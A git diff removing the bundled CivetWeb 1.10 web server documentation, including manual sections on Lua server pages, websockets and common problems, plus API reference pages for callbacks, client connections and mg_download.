-### allow\_index\_script\_resource `no`
-Index scripts (like `index.cgi` or `index.lua`) may have script handled resources.
-
-It this feature is activated, that /some/path/file.ext might be handled by:
-  1. /some/path/file.ext (with PATH\_INFO='/', if ext = cgi)
-  2. /some/path/index.lua with mg.request\_info.path\_info='/file.ext'
-  3. /some/path/index.cgi with PATH\_INFO='/file.ext'
-  4. /some/path/index.php with PATH\_INFO='/file.ext'
-  5. /some/index.lua with mg.request\_info.path\_info=='/path/file.ext'
-  6. /some/index.cgi with PATH\_INFO='/path/file.ext'
-  7. /some/index.php with PATH\_INFO='/path/file.ext'
-  8. /index.lua with mg.request\_info.path\_info=='/some/path/file.ext'
-  9. /index.cgi with PATH\_INFO='/some/path/file.ext'
-  10. /index.php with PATH\_INFO='/some/path/file.ext'
-
-Note: This example is valid, if the default configuration values for `index_files`, `cgi_pattern` and `lua_script_pattern` are used, and the server is built with CGI and Lua support enabled.
-
-If this feature is not activated, only the first file (/some/path/file.cgi) will be accepted.
-
-Note: This parameter affects only index scripts. A path like /here/script.cgi/handle/this.ext will call /here/script.cgi with PATH\_INFO='/handle/this.ext', no matter if this option is set to `yes` or `no`. 
-
-This feature can be used to completely hide the script extension from the URL.
-
-### additional\_header
-Send additional HTTP response header line for every request.
-The full header line including key and value must be specified, excluding the carriage return line feed.
-
-Example (used as command line option): 
-`-additional_header "X-Frame-Options: SAMEORIGIN"`
-
-This option can be specified multiple times. All specified header lines will be sent.
-
-# Lua Scripts and Lua Server Pages
-Pre-built Windows and Mac civetweb binaries have built-in Lua scripting
-support as well as support for Lua Server Pages.
-
-Lua scripts (default extension: *.lua) use plain Lua syntax.
-The body of the script file is not sent directly to the client,
-the Lua script must send header and content of the web page by calling
-the function mg.write(text).
-
-Lua Server Pages (default extensions: *.lsp, *.lp) are html pages containing
-script elements similar to PHP, using the Lua programming language instead of
-PHP. Lua script elements must be enclosed in `<?  ?>` blocks, and can appear
-anywhere on the page. Furthermore, Lua Server Pages offer the opportunity to
-insert the content of a variable by enclosing the Lua variable name in
-`<?=  ?>` blocks, similar to PHP.
-For example, to print the current weekday name and the URI of the current
-page, one can write:
-
-    <p>
-      <span>Today is:</span>
-      <? mg.write(os.date("%A")) ?>
-    </p>
-    <p>
-      URI is <?=mg.request_info.uri?>
-    </p>
-
-Lua is known for it's speed and small size. Civetweb currently uses Lua
-version 5.2.4. The documentation for it can be found in the
-[Lua 5.2 reference manual](http://www.lua.org/manual/5.2/).
-
-
-Note that this example uses function `mg.write()`, which sends data to the
-web client. Using `mg.write()` is the way to generate web content from inside
-Lua code. In addition to `mg.write()`, all standard Lua library functions
-are accessible from the Lua code (please check the reference manual for
-details). Lua functions working on files (e.g., `io.open`) use a path
-relative to the working path of the civetweb process. The web server content
-is located in the path `mg.document_root`.
-Information on the request is available in the `mg.request_info`
-object, like the request method, all HTTP headers, etcetera.
-
-[page2.lua](https://github.com/civetweb/civetweb/blob/master/test/page2.lua)
-is an example for a plain Lua script.
-
-[page2.lp](https://github.com/civetweb/civetweb/blob/master/test/page2.lp)
-is an example for a Lua Server Page.
-
-Both examples show the content of the `mg.request_info` object as the page
-content. Please refer to `struct mg_request_info` definition in
-[civetweb.h](https://github.com/civetweb/civetweb/blob/master/include/civetweb.h)
-to see additional information on the elements of the `mg.request_info` object.
-
-Civetweb also provides access to the [SQlite3 database](http://www.sqlite.org/)
-through the [LuaSQLite3 interface](http://lua.sqlite.org/index.cgi/doc/tip/doc/lsqlite3.wiki)
-in Lua. Examples are given in
-[page.lua](https://github.com/civetweb/civetweb/blob/master/test/page.lua) and
-[page.lp](https://github.com/civetweb/civetweb/blob/master/test/page.lp).
-
-
-Civetweb exports the following functions to Lua:
-
-mg (table):
-
-    mg.read()                  -- reads a chunk from POST data, returns it as a string
-    mg.write(str)              -- writes string to the client
-    mg.include(filename, [pathtype]) -- include another Lua Page file (Lua Pages only)
-                               -- pathtype can be "abs", "rel"/"file" or "virt[ual]"
-                               -- like defined for SSI #include
-    mg.redirect(uri)           -- internal redirect to a given URI
-    mg.onerror(msg)            -- error handler, can be overridden
-    mg.version                 -- a string that holds Civetweb version
-    mg.document_root           -- a string that holds the document root directory
-    mg.auth_domain             -- a string that holds the HTTP authentication domain
-    mg.get_var(str, varname)   -- extract variable from (query) string
-    mg.get_cookie(str, cookie) -- extract cookie from a string
-    mg.get_mime_type(filename) -- get MIME type of a file
-    mg.get_info(infotype)      -- get server status information
-    mg.send_file(filename)     -- send a file, including MIME type
-    mg.url_encode(str)         -- URL encode a string
-    mg.url_decode(str, [form]) -- URL decode a string. If form=true, replace + by space.
-    mg.base64_encode(str)      -- BASE64 encode a string
-    mg.base64_decode(str)      -- BASE64 decode a string
-    mg.md5(str)                -- return the MD5 hash of a string
-    mg.keep_alive(bool)        -- allow/forbid to use http keep-alive for this request
-    mg.request_info            -- a table with the following request information
-         .remote_addr          -- IP address of the client as string
-         .remote_port          -- remote port number
-         .server_port          -- server port number
-         .request_method       -- HTTP method (e.g.: GET, POST)
-         .http_version         -- HTTP protocol version (e.g.: 1.1)
-         .uri                  -- resource name
-         .query_string         -- query string if present, nil otherwise
-         .script_name          -- name of the Lua script
-         .https                -- true if accessed by https://, false otherwise
-         .remote_user          -- user name if authenticated, nil otherwise
-
-connect (function):
-
-    -- Connect to the remote TCP server. This function is an implementation
-    -- of simple socket interface. It returns a socket object with three
-    -- methods: send, recv, close, which are synchronous (blocking).
-    -- connect() throws an exception on connection error.
-    connect(host, port, use_ssl)
-
-    -- Example of using connect() interface:
-    local host = 'code.google.com'  -- IP address or domain name
-    local ok, sock = pcall(connect, host, 80, 1)
-    if ok then
-      sock:send('GET /p/civetweb/ HTTP/1.0\r\n' ..
-                'Host: ' .. host .. '\r\n\r\n')
-      local reply = sock:recv()
-      sock:close()
-      -- reply now contains the web page https://code.google.com/p/civetweb
-    end
-
-
-All filename arguments are either absolute or relative to the civetweb working
-directory (not the document root or the Lua script/page file).
-    
-**IMPORTANT: Civetweb does not send HTTP headers for Lua pages. Therefore,
-every Lua Page must begin with a HTTP reply line and headers**, like this:
-
-    <? mg.write('HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n') ?>
-    <html><body>
-      ... the rest of the web page ...
-
-To serve a Lua Page, civetweb creates a Lua context. That context is used for
-all Lua blocks within the page. That means, all Lua blocks on the same page
-share the same context. If one block defines a variable, for example, that
-variable is visible in all block that follow.
-
-## Websockets for Lua
-Civetweb offers support for websockets in Lua as well. In contrast to plain
-Lua scripts and Lua server pages, Lua websocket scripts are shared by all clients.
-
-Lua websocket scripts must define a few functions:
-    open(arg)    -- callback to accept or reject a connection
-    ready(arg)   -- called after a connection has been established
-    data(arg)    -- called when the server receives data from the client
-    close(arg)   -- called when a websocket connection is closed
-All function are called with one argument of type table with at least one field
-"client" to identify the client. When "open" is called, the argument table additionally
-contains the "request_info" table as defined above. For the "data" handler, an
-additional field "data" is available. The functions "open", "ready" and "data"
-must return true in order to keep the connetion open.
-
-Lua websocket pages do support single shot (timeout) and interval timers.
-
-An example is shown in
-[websocket.lua](https://github.com/civetweb/civetweb/blob/master/test/websocket.lua).
-
-
-# Common Problems
-- PHP doesn't work - getting empty page, or 'File not found' error. The
-  reason for that is wrong paths to the interpreter. Remember that with PHP,
-  the correct interpreter is `php-cgi.exe` (`php-cgi` on UNIX).
-  Solution: specify the full path to the PHP interpreter, e.g.:
-    `civetweb -cgi_interpreter /full/path/to/php-cgi`
-
-- `php-cgi` is unavailable, for example on Mac OS X. As long as the `php` binary is installed, you can run CGI programs in command line mode (see the example below). Note that in this mode, `$_GET` and friends will be unavailable, and you'll have to parse the query string manually using [parse_str](http://php.net/manual/en/function.parse-str.php) and the `QUERY_STRING` environmental variable.
-
-        #!/usr/bin/php
-        <?php
-        echo "Content-Type: text/html\r\n\r\n";
-        echo "Hello World!\n";
-        ?>
-
-- Civetweb fails to start. If Civetweb exits immediately when started, this
-  usually indicates a syntax error in the configuration file
-  (named `civetweb.conf` by default) or the command-line arguments.
-  Syntax checking is omitted from Civetweb to keep its size low. However,
-  the Manual should be of help. Note: the syntax changes from time to time,
-  so updating the config file might be necessary after executable update.
-
-- Embedding with OpenSSL on Windows might fail because of calling convention.
-  To force Civetweb to use `__stdcall` convention, add `/Gz` compilation
-  flag in Visual Studio compiler.
-
diff --git a/thirdparty/civetweb-1.10/docs/_config.yml b/thirdparty/civetweb-1.10/docs/_config.yml
deleted file mode 100644
index 259a24e..0000000
--- a/thirdparty/civetweb-1.10/docs/_config.yml
+++ /dev/null
@@ -1 +0,0 @@
-theme: jekyll-theme-tactile
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_callbacks.md b/thirdparty/civetweb-1.10/docs/api/mg_callbacks.md
deleted file mode 100644
index c7d69a1..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_callbacks.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_callbacks;`
-
-### Fields
-
-| Field | Description |
-| :--- | :--- |
-|**`begin_request`**|**`int (*begin_request)( struct mg_connection *conn );`**|
-| |The `begin_request()` callback function is called when CivetWeb has received a new HTTP request. If the callback function does not process the request, it should return 0. In that case CivetWeb will handle the request with the default callback routine. If the callback function returns a value between 1 and 999, CivetWeb does nothing and the callback function should do all the processing, including sending the proper HTTP headers etc. Starting at CivetWeb version 1.7, the function `begin_request()` is called before any authorization is done. If an authorization check is required, `request_handler()` should be used instead. The return value of the callback function is not only used to signal CivetWeb to not further process the request. The returned value is also stored as HTTP status code in the access log. |
-|**`connection_close`**|**`void (*connection_close)( const struct mg_connection *conn );`**|
-| |The callback function `connection_close()` is called when CivetWeb is closing a connection. The per-context mutex is locked when the callback function is invoked. The function is primarly useful for noting when a websocket is closing and removing it from any application-maintained list of clients. *Using this callback for websocket connections is deprecated. Use* `mg_set_websocket_handler()` *instead.*|
-|**`end_request`**|**`void (*end_request)(const struct mg_connection *conn, int reply_status_code);`**|
-| |The callback function `end_request()` is called by CivetWeb when a request has been completely processed. It sends the reply status code which was sent to the client to the application.|
-|**`exit_context`**|**`void (*exit_context)( const struct mg_context *ctx );`**|
-| |The callback function `exit_context()` is called by CivetWeb when the server is stopped. It allows the application to do some cleanup on the application side.|
-|**`http_error`**|**`int (*http_error)( struct mg_connection *conn, int status );`**|
-| |The callback function `http_error()` is called by CivetWeb just before an HTTP error is to be sent to the client. The function allows the application to send a custom error page. The status code of the error is provided as a parameter. If the application sends their own error page, it must return 1 to signal CivetWeb that no further processing is needed. If the returned value is 0, CivetWeb will send a built-in error page to the client.|
-|**`init_context`**|**`void (*init_context)( const struct mg_context *ctx );`**|
-| |The callback function `init_context()` is called after the CivetWeb server has been started and initialized, but before any requests are served. This allowes the application to perform some initialization activities before the first requests are handled.|
-|**`init_lua`**|**`void (*init_lua)( const struct mg_connection *conn, void *lua_context );`**|
-| |The callback function `init_lua()` is called just before a Lua server page is to be served. Lua page serving must have been enabled at compile time for this callback function to be called. The parameter `lua_context` is a `lua_State *` pointer.|
-|**`init_ssl`**|**`int (*init_ssl)( void *ssl_context, void *user_data );`**|
-| |The callback function `init_ssl()` is called when CivetWeb initializes the SSL library. The parameter `user_data` contains a pointer to the data which was provided to `mg_start()` when the server was started. The callback function can return 0 to signal that CivetWeb should setup the SSL certificate. With a return value of 1 the callback function signals CivetWeb that the certificate has already been setup and no further processing is necessary. The value -1 should be returned when the SSL initialization fails.|
-|**`init_thread`**|**`void (*init_thread)( const struct mg_context *ctx, int thread_type );`**|
-| |The callback function `init_thread()` is called when a new thread is created by CivetWeb. The `thread_type` parameter indicates which type of thread has been created. following thread types are recognized:|
-| |**0** - The master thread is created |
-| |**1** - A worker thread which handles client connections has been created|
-| |**2** - An internal helper thread (timer thread) has been created|
-|**`log_access`**|**`int (*log_access)( const struct mg_connection *conn, const char *message );`**|
-| |The callback function `log_access()` is called when CivetWeb is about to log a message. If the callback function returns 0, CivetWeb will use the default internal access log routines to log the access. If a non-zero value is returned, CivetWeb assumes that access logging has already been done and no further action is performed.|
-|**`log_message`**|**`int (*log_message)( const struct mg_connection *conn, const char *message );`**|
-| |The callback function `log_message()` is called when CivetWeb is about to log a message. If the callback function returns 0, CivetWeb will use the default internal log routines to log the message. If a non-zero value is returned CivetWeb assumes that logging has already been done and no further action is performed.|
-|**`open_file`**|**`const char *(*open_file)( const struct mg_connection *conn, const char *path, size_t *data_len );`**|
-| |The callback function `open_file()` is called when a file is to be opened by CivetWeb. The callback can return a pointer to a memory location and set the memory block size in the variable pointed to by `data_len` to signal CivetWeb that the file should not be loaded from disk, but that instead a stored version in memory should be used. If the callback function returns NULL, CivetWeb will open the file from disk. This callback allows caching to be implemented at the application side, or to serve specific files from static memory instead of from disk.|
-|~~`upload`~~|**`void (*upload)( struct mg_connection * conn, const char *file_name );`**|
-| |*Deprecated. Use* `mg_handle_form_request()` *instead.* The callback function `upload()` is called when CivetWeb has uploaded a file to a temporary directory as result of a call to `mg_upload()`. The parameter `file_name` contains the full file name including path to the uploaded file.|
-|~~`websocket_connect`~~|**`int (*websocket_connect)( const struct mg_connection *conn );`**|
-| |*Deprecated. Use* `mg_set_websocket_handler()` *instead.* The callback function `websocket_connect()` is called when a websocket request is received, before the actual websocket handshake has taken place. The callback function can signal to CivetWeb if it should accept or deny the incoming request with one of the following return values: |
-| |**0** - CivetWeb can proceed with the handshake to accept the connection |
-| |**1** - CivetWeb must close the connection immediately without performing a handshake |
-|~~`websocket_data`~~|**`int (*websocket_data)( struct mg_connection *conn, int bits, char *data, size_t data_len );`**|
-| |*Deprecated. Use* `mg_set_websocket_handler()` *instead.* The callback function `websocket_data()` is called when a data frame has been received from the client. The parameters contain the following information: |
-| | **`bits`** - The first byte of the websocket frame. See [RFC-6455](http://tools.ietf.org/html/rfc6455) at section 5.2 for more information. |
-| | **`data`** - The pointer to the received data block. Masks--if any--have already been applied. |
-| | **`data_len`** - The length of the received data block |
-| | If the application wants to keep the websocket open to receive more data, the callback function should return the value **1**. If the value **0** is returned by the callback function, CivetWeb will close the websocket connection and no more frames will be received.|
-|~~`websocket_ready`~~|**`int (*websocket_ready)( struct mg_connection *conn );`**|
-| |*Deprecated. Use* `mg_set_websocket_handler()` *instead.* The callback function `websocket_ready()` is called after the handshake of a websocket connection has succeeded succesfully to signal the application that the connection is ready for use. |
-
-### Description
-
-Much of the functionality in the Civetweb library is provided through callback functions. The application registers their own processing functions with the Civetweb library and when an event happens, the appropriate callback function is called. In this way an application is able to have their processing code right at the heart of the webserver, without the need to change the code of the webserver itself. A number of callback functions are registered when the civetweb subsystem is started. Other may be added or changed at runtime with helper functions.
-
-A pointer to a `mg_callbacks` structure is passed as parameter to the [`mg_start()`](mg_start.md) function to provide links to callback functions which the webserver will call at specific events. If a specific callback function is not supplied, CivetWeb will fallback to default internal callback routines. Callback functions give the application detailed control over how specific events should be handled.
-
-### See Also
-
-* [`mg_start();`](mg_start.md)
-* [`mg_stop();`](mg_stop.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_check_digest_access_authentication.md b/thirdparty/civetweb-1.10/docs/api/mg_check_digest_access_authentication.md
deleted file mode 100644
index fec3ad3..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_check_digest_access_authentication.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# Civetweb API Reference
-
-### `mg_check_digest_access_authentication( conn, realm, filename );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`| A pointer to the connection to be used to send data |
-|**`realm`**|`const char *`| The requested authentication realm or NULL |
-|**`filename`**|`const char *`| The path to the passwords file |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`int`| An integer indicating success or failure |
-
-### Description
-
-This function can be used to check if a request header contains HTTP digest authentication
-information, matching user and password encoded within the password file.
-If the authentication realm (also called authentication domain) is NULL, the parameter
-`authentication_domain` as specified in the server configuration (`mg_start()`) is used.
-
-A positive return value means, the user name, realm and a correct password hash have been
-found in the passwords file.
-A return of 0 means, reading the password file succeeded, but there was no matching user,
-realm and password.
-The function returns a negative number on errors.
-
-### See Also
-
-* [`mg_send_digest_access_authentication_request();`](mg_send_digest_access_authentication_request.md)
-* [`mg_modify_passwords_file();`](mg_modify_passwords_file.md)
-* [`mg_start();`](mg_start.md)
-
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_check_feature.md b/thirdparty/civetweb-1.10/docs/api/mg_check_feature.md
deleted file mode 100644
index 1da1b07..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_check_feature.md
+++ /dev/null
@@ -1,40 +0,0 @@
-# Civetweb API Reference
-
-### `mg_check_feature( feature );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`feature`**|`unsigned`| A value indicating the feature to be checked |
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`unsigned`| A value indicating if a feature is available. A positive value indicates available, while **0** is returned for an unavailable feature |
-
-### Description
-
-The function `mg_check_feature()` can be called from an application program to check of specific features have been compiled in the civetweb version which the application has been linked to. The feature to check is provided as an unsigned integer parameter. If the function is available in the currently linked library version, a value **> 0** is returned. Otherwise the function `mg_check_feature()` returns the value **0**.
-
-The following parameter values can be used:
-
-| Value | Compilation option | Description |
-| :---: | :---: | :--- |
-| **1** | NO_FILES | *Able to serve files*.  If this feature is available, the webserver is able to serve files directly from a directory tree. |
-| **2** | NO_SSL | *Support for HTTPS*. If this feature is available, the webserver van use encryption in the client-server connection. SSLv2, SSLv3, TLSv1.0, TLSv1.1 and TLSv1.2 are supported depending on the SSL library CivetWeb has been compiled with, but which protocols are used effectively when the server is running is dependent on the options used when the server is started. |
-| **4** | NO_CGI | *Support for CGI*. If this feature is available, external CGI scripts can be called by the webserver. |
-| **8** | USE_IPV6 | *Support IPv6*. The CivetWeb library is capable of communicating over both IPv4 and IPv6, but IPv6 support is only available if it has been enabled at compile time. |
-| **16** | USE_WEBSOCKET | Support for web sockets. WebSockets support is available in the CivetWeb library if the proper options has been used during cimpile time. |
-| **32** | USE_LUA | *Support for Lua scripts and Lua server pages*. CivetWeb supports server side scripting through the Lua language, if that has been enabled at compile time. Lua is an efficient scripting language which is less resource heavy than for example PHP. |
-| **64** | USE_DUKTAPE | *Support for server side JavaScript*. Server side JavaScript can be used for dynamic page generation if the proper options have been set at compile time. Please note that client side JavaScript execution is always available if it has been enabled in the connecting browser. |
-| **128** | NO_CACHING | *Support for caching*. The webserver will support caching, if it has not been disabled while compiling the library. |
-
-Parameter values other than the values mentioned above will give undefined results. Therefore&mdash;although the parameter values for the `mg_check_feature()` function are effectively bitmasks, you should't assume that combining two of those values with an OR to a new value will give any meaningful results when the function returns.
-
-### See Also
-
-* [`mg_get_option();`](mg_get_option.md)
-* [~~`mg_get_valid_option_names();`~~](mg_get_valid_option_names.md)
-* [`mg_get_valid_options();`](mg_get_valid_options.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_client_cert.md b/thirdparty/civetweb-1.10/docs/api/mg_client_cert.md
deleted file mode 100644
index c81fbd0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_client_cert.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_client_cert;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`subject`**|`const char *`| The subject of the certificate |
-|**`issuer`**|`const char *`| The issuer of the certificate |
-|**`serial`**|`const char *`| The serial number of the certificate |
-|**`finger`**|`const char *`| The fingerprint of the certificate |
-
-### Description
-
-The structure `client_cert` is used as a sub-structure in the [`mg_request_info`](mg_request_info.md) structure to store information of an optional client supplied certificate.
-
-### See Also
-
-* [`struct mg_request_info;`](mg_request_info.md)
-* [`mg_get_request_info();`](mg_get_request_info.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_client_options.md b/thirdparty/civetweb-1.10/docs/api/mg_client_options.md
deleted file mode 100644
index f3b9b68..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_client_options.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Civetweb API Reference
-
-### `struct mg_client_options;`
-
-### Fields
-
-| Field | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|The hostname or IP address to connect to|
-|**`port`**|`int`|The port on the server|
-|**`client_cert`**|`const char *`|Pointer to client certificate|
-|**`server_cert`**|`const char *`|Pointer to a server certificate|
-
-### Description
-
-The the `mgclient_options` structure contains host and security information to connect as a client to another host. A parameter of this type is used in the call to the function [`mg_connect_client_secure();`](mg_connect_client_secure.md). Please note that IPv6 addresses are only permitted if IPv6 support was enabled during compilation. You can use the function [`mg_check_feature()`](mg_check_feature.md) with the parameter `USE_IPV6` while running your application to check if IPv6 is supported.
-
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_close_connection.md b/thirdparty/civetweb-1.10/docs/api/mg_close_connection.md
deleted file mode 100644
index ca8d2a1..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_close_connection.md
+++ /dev/null
@@ -1,21 +0,0 @@
-# Civetweb API Reference
-
-### `mg_close_connection( conn );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`struct mg_connection *`|The connection which must be closed|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_close_connection()` is used to close a connection which was opened with the [`mg_download()`](mg_download.md) function. Use of this function to close a connection which was opened in another way is undocumented and may give unexpected results.
-
-### See Also
-
-* [`mg_download();`](mg_download.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_connect_client.md b/thirdparty/civetweb-1.10/docs/api/mg_connect_client.md
deleted file mode 100644
index e2aa773..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_connect_client.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_connect_client( host, port, use_ssl, error_buffer, error_buffer_size );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|hostname or IP address of the server|
-|**`port`**|`int`|The port to connect to on the server|
-|**`use_ssl`**|`int`|Connects using SSL of this value is not zero|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Maximum size of the error buffer including the NUL terminator|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`||
-
-### Description
-
-The function `mg_connect_client()` connects to a TCP server as a client. This server can be a HTTP server but this is not necessary. The function returns a pointer to a connection structure when the connection is established and NULL otherwise. The host may be on IPv4 or IPv6, but IPv6 is not enabled in every Civetweb installation. Specifically the use of IPv6 communications has to be enabled when the library is compiled. At runtime you can use the [`mg_check_feature()`](mg_check_feature.md) function with the parameter `USE_IPV6` to check if IPv6 communication is supported.
- 
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
-* [`mg_connect_websocket_client();`](mg_connect_websocket_client.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_connect_client_secure.md b/thirdparty/civetweb-1.10/docs/api/mg_connect_client_secure.md
deleted file mode 100644
index a87949b..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_connect_client_secure.md
+++ /dev/null
@@ -1,30 +0,0 @@
-# Civetweb API Reference
-
-### `mg_connect_client_secure( client_options, error_buffer, error_buffer_size );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`client_options`**|`const struct mg_client_options *`|Settings about the server connection|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Size of the error message buffer including the NUL terminator|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`||
-
-### Description
-
-The function `mg_connect_client_secure()` creates a secure connection with a server. The information about the connection and server is passed in a structure and an error message may be returned in a local buffer. The function returns a pointer to a `struct mg_connection` structure when successful and NULL otherwise.
-
-Please note that IPv6 communication is supported by Civetweb, but only if the use of IPv6 was enabled at compile time. The check while running a program if IPv6 communication is possible you can call [`mg_check_feature()`](mg_check_feature.md) with the `USE_IPV6` parameter to check if IPv6 communications can be used.
-
-### See Also
-
-* [`struct mg_client_options;`](mg_client_options.md)
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_connect_websocket_client();`](mg_connect_websocket_client.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_connect_websocket_client.md b/thirdparty/civetweb-1.10/docs/api/mg_connect_websocket_client.md
deleted file mode 100644
index 8562b25..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_connect_websocket_client.md
+++ /dev/null
@@ -1,36 +0,0 @@
-# Civetweb API Reference
-
-### `mg_connect_websocket_client( host, port, use_ssl, error_buffer, error_buffer_size, path, origin, data_func, close_func, user-data);`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|The hostname or IP address of the server|
-|**`port`**|`int`|The port on the server|
-|**`use_ssl`**|`int`|Use SSL if this parameter is not equal to zero|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Size of the error message buffer including the NUL terminator|
-|**`path`**|`const char *`|The server path to connect to, for example `/app` if you want to connect to `localhost/app`|
-|**`origin`**|`const char *`|The value of the `Origin` HTTP header|
-|**`data_func`**|`mg_websocket_data_handler`|Callback which is used to process data coming back from the server|
-|**`close_func`**|`mg_websocket_close_handler`|Callback which is called when the connection is to be closed|
-|**`user_data`**|`void *`|User supplied argument|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`|A pointer to the connection structure, or NULL if connecting failed|
-
-### Description
-
-The function `mg_connect_websocket_client()` connects to a websocket on a server as a client. Data and close events are processed with callback functions which must be provided in the call.
-
-Civetweb supports both IPv4 and IPv6 communication, but only if the use if IPv6 has been enabled at compile time. When running an application it is possible to check if IPv6 addressing is available by calling the [`mg_check_feature()`](mg_check_feature.md) function with the `USE_IPV6` parameter.
-
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_connect_client();`](mg_connect_client.md)
-* [`mg_connect_client_secure();`](mg_connect_client_secure.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_cry.md b/thirdparty/civetweb-1.10/docs/api/mg_cry.md
deleted file mode 100644
index 0cf45c9..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_cry.md
+++ /dev/null
@@ -1,23 +0,0 @@
-# Civetweb API Reference
-
-### `mg_cry( conn, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`conn`**|`const struct mg_connection *`|The connection on which a problem occured|
-|**`fmt`**|`const char *`|Format string without a line return|
-|**`...`**|*various*|Parameters depending on the format string|
-
-### Return Value
-
-*none*
-
-### Description
-
-The function `mg_cry()` is called when something happens on a connection. The function takes a format string similar to the `printf()` series of functions with parameters and creates a text string which can then be used for logging. The `mg_cry()` function prints the output to the opened error log stream. Log messages can be processed with the `log_message()` callback function specified in the `struct mg_callbacks` structure.
-
-### See Also
-
-* [`struct mg_callbacks;`](mg_callbacks.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_download.md b/thirdparty/civetweb-1.10/docs/api/mg_download.md
deleted file mode 100644
index 1dbded0..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_download.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# Civetweb API Reference
-
-### `mg_download( host, port, use_ssl, error_buffer, error_buffer_size, fmt, ... );`
-
-### Parameters
-
-| Parameter | Type | Description |
-| :--- | :--- | :--- |
-|**`host`**|`const char *`|The hostname or IP address of the server|
-|**`port`**|`int`|The port number on the server|
-|**`use_ssl`**|`int`|Use SSL if this value is not equal zero|
-|**`error_buffer`**|`char *`|Buffer to store an error message|
-|**`error_buffer_size`**|`size_t`|Size of the error message buffer including the terminating NUL|
-|**`fmt`**|`const char *`|Format string specifying the remote command to execute|
-|**`...`**|*various*|Parameters used in the format string|
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`struct mg_connection *`|A pointer to the connection structure if successful and NULL otherwise|
-
-### Description
-
-The `mg_download()` function is used to download data from a remote webserver. The server address can either be specified as a hostname or IP address and SSL can be used if needed. If the function succeeds, a pointer is returned to a connection structure. The connection must be closed with a call to the [`mg_close_connection()`](mg_close_connection.md) function.
-
-The format string is a format string from the `printf()` series of functions to specify the remote command. An example to get the main index page from Google is the following call:
-
-`conn = mg_download( "google.com", 80, 0, ebuf, sizeof(ebuf),
-                     "%s", "GET / HTTP/1.0\r\nHost: google.com\r\n\r\n" );`
-
-Please note that although Civetweb supports both IPv4 and IPv6 communication that IPv6 addressing is only available if it was enabled at compile time. When running an application it is possible to check if IPv6 support has been compiled in by using the [`mg_check_feature()`](md_check_feature.md) function with the parameter `USE_IPV6`.
-
-### See Also
-
-* [`mg_check_feature();`](mg_check_feature.md)
-* [`mg_close_connection();`](mg_close_connection.md)
diff --git a/thirdparty/civetweb-1.10/docs/api/mg_exit_library.md b/thirdparty/civetweb-1.10/docs/api/mg_exit_library.md
deleted file mode 100644
index 2643403..0000000
--- a/thirdparty/civetweb-1.10/docs/api/mg_exit_library.md
+++ /dev/null
@@ -1,29 +0,0 @@
-# Civetweb API Reference
-
-### `mg_exit_library( );`
-
-### Parameters
-
-none
-
-### Return Value
-
-| Type | Description |
-| :--- | :--- |
-|`unsigned`| **0** is returned or error |
-
-### Description
-
